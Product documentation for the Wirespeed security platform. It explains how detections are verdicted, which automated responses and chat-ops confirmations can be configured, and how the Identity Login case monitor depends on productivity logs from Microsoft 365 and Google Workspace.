Skip to main content

Documentation Index

Fetch the complete documentation index at: https://docs.wirespeed.co/llms.txt

Use this file to discover all available pages before exploring further.

After Wirespeed receives a detection from one of your integrations, it is categorized and goes through the process of verdicting. Verdicts are a series of enrichments and checks we perform on detections and related data in your environment to determine what actions should be performed. Below are a few examples from the Endpoint > Execution detection verdicts: Verdicts The verdicts are processed in a top down order. If the first verdict is not true, it continues until a true verdict is reached or we hit the default verdict. You can customize these verdicts to tune Wirespeed to your environment.

Customizing Verdicts

You can customize Wirespeed’s automatic response options, chat ops, and severities for each verdict.

Response

Contain User

Lock the user account of any user’s associated with this detection

Contain Endpoint

Network isolate any endpoints associated with this detection

Escalate

Notify your team about the detection for manually investigation

Correlate & close

Close the detection and allow it to be used as a threat indicator for other cases.

Skip

Ignore this verdict and continue on. You cannot skip the default rule.

Chat Ops

Reach out to the user(s) affected by this detection and ask them if it was an intentional action by them. Additional options are available to require the user to perform SMS MFA for identity verification, verify with their manager, and enable/disable chat ops for VIP users.

Chat Ops Timeout Verdict

When a user does not respond within the chat ops timeout window you have defined in your team settings, you can declare a verdict to use.

Chat Ops Unsure Verdict

When a user responds they are unsure if they performed the action that caused the detection, you can declare a verdict to use.
Malicious will result in the user & endpoint being contained, benign will close the case, and suspicious will escalate.

Case monitors and productivity logs

Case monitors run for some categories (for example Identity Login) and watch for patterns over time using platform data, not only the original detection. The Identity Login monitor depends on productivity logs: mailbox and related collaboration activity that Wirespeed stores as productivity-tagged events. Before running its rules, the monitor checks that your tenant has enough recent volume (at least 250 productivity-tagged events in the last 30 days). If that threshold is not met, the monitor skips so it does not draw conclusions without enough data. That is not a signal that a specific integration is broken; it means productivity log volume in Wirespeed is too low for this monitor to run meaningfully.

Which integrations supply productivity logs?

Productivity-tagged events come from:
IntegrationRole
Microsoft (Microsoft 365)Unified Audit Log (UAL) activity that Wirespeed maps to productivity actions (for example mailbox rules, mail access/send/delete, SharePoint/OneDrive file activity, and certain account-related operations).
Google WorkspaceGmail audit/reporting (message sent and received).
Other integrations do not currently feed this productivity stream. If you rely only on vendors outside that table, you may see the skip message until Microsoft 365 and/or Google Workspace mail and audit data is connected and ingested at sufficient volume.